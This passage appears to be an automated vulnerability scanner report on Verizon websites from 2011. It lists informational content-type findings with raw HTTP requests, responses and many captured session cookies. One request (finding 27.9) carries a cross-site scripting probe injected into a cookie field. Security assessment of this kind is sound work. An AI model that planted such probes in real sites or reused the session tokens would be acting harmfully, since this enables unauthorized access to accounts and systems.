Content-Location: http://www22.verizon.com/foryoursmallbiz/goflow/common/images/OrderNew/form/checkbox.gif
Last-Modified: Thu, 01 Sep 2011 17:51:56 GMT
Accept-Ranges: bytes
ETag: "0c6e8d6cf68cc1:6129"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 22:25:11 GMT
Connection: keep-alive

.PNG
.
...IHDR.......d.....D.kN....PLTE.............~.....u..............l.....d.............
...............\..........=\:{.....x..A\=<_;...u.{v.{p.}p.}.V.<d;t.w..................t.yY.f8k:[.fs.w...
...[SNIP]...

26.71. https://www22.verizon.com/includes/cache/getwb31.asp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/includes/cache/getwb31.asp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain HTML.

Request

Response

26.72. https://www22.verizon.com/includes/javascript/commonjs/ previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/includes/javascript/commonjs/

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

26.73. https://www22.verizon.com/includes/javascript/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/includes/javascript/oo_engine_c.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

27. Content type is not specified previous
There are 15 instances of this issue:

https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/config.xml
https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml
http://newscenter.verizon.com/assets/igallery/ESPN3.JPG
http://webmail.verizon.com/favicon.ico
http://webmail.verizon.net/favicon.ico
http://www22.verizon.com/includes/javascript/pagetracker.js
https://www22.verizon.com/includes/javascript/hbx.js/
https://www22.verizon.com/includes/javascript/hbx_custom.js/
https://www22.verizon.com/includes/javascript/hbx_dupreq.js
https://www22.verizon.com/includes/javascript/pagetracker.js
https://www22.verizon.com/includes/javascript/scb.js
https://www22.verizon.com/includes/javascript/scb31.js
https://www22.verizon.com/includes/javascript/scb31menu.js
https://www22.verizon.com/includes/javascript/scbsearch.js
https://www22.verizon.com/includes/javascript/sitewise.js/

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/config.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/config.xml

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/config.xml HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 864
Accept-Ranges: bytes
Last-Modified: Wed, 06 Jul 2011 19:14:34 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:26:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:26:27 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<config>
   <languages>
       <language id="en">
           <fonts url="fonts/fonts_en.swf" />
           <content url="content/data_feed_en.xml" />
           <styles url="css/flash_en.css"
...[SNIP]...

27.2. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/content/data_feed_en.xml HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 4601
Accept-Ranges: bytes
Last-Modified: Fri, 08 Jul 2011 14:13:40 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Expires: Mon, 05 Sep 2011 22:26:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:26:43 GMT
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<root width="1000" height="500">

<pages>
   
   <page id="terremark2" enabled="true" timing="10">
       <label><![CDATA[Terremark]]></label>
       <content typ
...[SNIP]...

27.3. http://newscenter.verizon.com/assets/igallery/ESPN3.JPG previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newscenter.verizon.com
Path:	/assets/igallery/ESPN3.JPG

Request

GET /assets/igallery/ESPN3.JPG HTTP/1.1
Host: newscenter.verizon.com
Proxy-Connection: keep-alive
Referer: http://newscenter.verizon.com/fact-sheets/verizon-high-speed-internet.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; lob=dotcom; myservices=vzdock=N; VISITORID=1597650297; JSESSIONID=abcEBYCpNovpd9FINW7it

Response

HTTP/1.1 200 OK
Xet-Cookie:
Age: 1
Date: Mon, 05 Sep 2011 22:43:19 GMT
Connection: Keep-Alive
Via: NS-CACHE-6.0: 62
ETag: "/fGKYZ/MZ43"
Server: Resin/3.1.8
Last-Modified: Mon, 02 May 2011 21:17:53 GMT
Content-Length: 1484

......JFIF.....`.`.....C........... .
................... $.' ",#..(7),01444.'9=82<.342...C. .....2!.!22222222222222222222222222222222222222222222222222...... .g.."..............................
...[SNIP]...

27.4. http://webmail.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; webmail_ad="ad=1"; lob=webmail

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"766-1297453846000"
Last-Modified: Fri, 11 Feb 2011 19:50:46 GMT
Content-Length: 766
Date: Mon, 05 Sep 2011 22:18:51 GMT

...... ..............(... ...@...................................kk..**................................................QQ............................................................................
...[SNIP]...

27.5. http://webmail.verizon.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: webmail.verizon.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webmail_ad="ad=1"; lob=webmail; WT_FPC=id=2a58c7583c8b5978c401315268334507:lv=1315268334507:ss=1315268334507; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"766-1297453846000"
Last-Modified: Fri, 11 Feb 2011 19:50:46 GMT
Content-Length: 766
Date: Mon, 05 Sep 2011 22:19:12 GMT

...... ..............(... ...@...................................kk..**................................................QQ............................................................................
...[SNIP]...

27.6. http://www22.verizon.com/includes/javascript/pagetracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/includes/javascript/pagetracker.js

Request

GET /includes/javascript/pagetracker.js HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 5484
Date: Mon, 05 Sep 2011 22:13:38 GMT
Connection: close

var clickEvents='';
var tempX='';
var tempY='';
if(navigator.appVersion.indexOf('MSIE')>0){
   document.onmousedown=IEPouseClick;
   document.onkeydown=IEKeyDown;
}else{
   window.onmousedown=NSPou
...[SNIP]...

27.7. https://www22.verizon.com/includes/javascript/hbx.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx.js/

Request

Response

27.8. https://www22.verizon.com/includes/javascript/hbx_custom.js/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx_custom.js/

Request

Response

27.9. https://www22.verizon.com/includes/javascript/hbx_dupreq.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/hbx_dupreq.js

Request

GET /includes/javascript/hbx_dupreq.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660; lob=dotcom

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:42:09 GMT
Content-Length: 934
Connection: keep-alive

var vs_im=new Image();
function _hbOnPostPV(a){
   var i0=a.indexOf('cd=');
   var i1=i0-1;
   var i2=a.indexOf('c1=')
   var i3= i2-1
   var x=a.substring(i0,i3);
   var j0=a.indexOf('c4=');
   var j1=a.
...[SNIP]...

27.10. https://www22.verizon.com/includes/javascript/pagetracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www22.verizon.com
Path:	/includes/javascript/pagetracker.js

Request

GET /includes/javascript/pagetracker.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; ContextInfo_TV=FiOSTV; ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=; IHAClientIP=112.64.2.103; RecentlyVisited=Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; refURL=https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx?ihaweb=WebSTBFrozen; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Date: Mon, 05 Sep 2011 22:24:58 GMT
Content-Length: 5484
Connection: keep-alive

var clickEvents='';
var tempX='';
var tempY='';
if(navigator.appVersion.indexOf('MSIE')>0){
   document.onmousedown=IEPouseClick;
   document.onkeydown=IEKeyDown;
}else{
   window.onmousedown=NSPou
